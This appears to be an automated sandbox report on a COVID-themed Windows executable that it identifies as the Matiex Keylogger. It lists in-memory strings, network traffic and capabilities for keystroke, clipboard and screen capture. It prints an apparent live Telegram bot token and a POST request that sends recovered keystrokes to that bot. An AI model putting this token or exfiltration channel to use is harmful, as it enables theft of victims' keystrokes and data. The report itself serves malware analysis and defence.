Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: dwnl.exe, 00000021.00000002.500760473.0000000002F24000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org
Source: dwnl.exe, 00000021.00000002.500760473.0000000002F24000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactu
Source: dwnl.exe, 00000021.00000002.500150887.0000000002E2A000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.500313293.0000000002E73000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.500473529.0000000002EAF000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499399021.0000000002D24000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499484272.0000000002D3A000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120
Source: dwnl.exe, 00000021.00000002.499399021.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.orgD8
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app/xml/
Source: dwnl.exe, 00000021.00000002.500097152.0000000002E14000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499750087.0000000002DBF000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app/xml/84.17.52.51
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: dwnl.exe, 00000021.00000002.500097152.0000000002E14000.00000004.00000001.sdmp String found in binary or memory: https://www.geodatatool.com/en/?ip=
Source: dwnl.exe, 00000021.00000002.500865912.0000000002F78000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499712859.0000000002DB7000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499993067.0000000002E05000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499842300.0000000002DED000.00000004.00000001.sdmp String found in binary or memory: https://www.geodatatool.com/en/?ip=84.17.52.51
Source: dwnl.exe, 00000021.00000002.500413972.0000000002E93000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499311102.0000000002D07000.00000004.00000001.sdmp String found in binary or memory: https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%2
Source: UK COVID UPDATES AND ENTITLEMENT.exe String found in binary or memory: https://www.gnu.org/licenses/gpl-3.0.html
Source: UK COVID UPDATES AND ENTITLEMENT.exe String found in binary or memory: https://www.gnu.org/licenses/gpl-3.0.htmlF
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: www.google.com
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040221C ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_0040221C
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421347506.0000000007D20000.00000004.00000001.sdmp String found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comN equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416917589.0000000001256000.00000004.00000020.sdmp String found in binary or memory: -Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416957325.00000000012AE000.00000004.00000001.sdmp String found in binary or memory: -Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comO equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: DESKTOP-71... www.youtube.com 172.217.20.14 32 27 equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: DESKTOP-71... www.youtube.com 172.217.20.14 32 28 equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: DESKTOP-71... www.youtube.com 172.217.20.14 32 30 equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: PS>Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.417366886.0000000002DA1000.00000004.00000001.sdmp String found in binary or memory: Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416957325.00000000012AE000.00000004.00000001.sdmp String found in binary or memory: Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comO equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421347506.0000000007D20000.00000004.00000001.sdmp String found in binary or memory: Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comX equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768030b76e62Host: api.telegram.orgContent-Length: 749Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to capture and log keystrokes
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Esc] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Enter] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Tab] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Down] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Right] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Up] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Left] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [End] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [F2] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [F1] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Del] 28_2_004043BF
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: [Del] 28_2_004043BF
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040D71E CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,StretchBlt,GetObjectA,LocalAlloc,GlobalAlloc,GetDIBits,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalF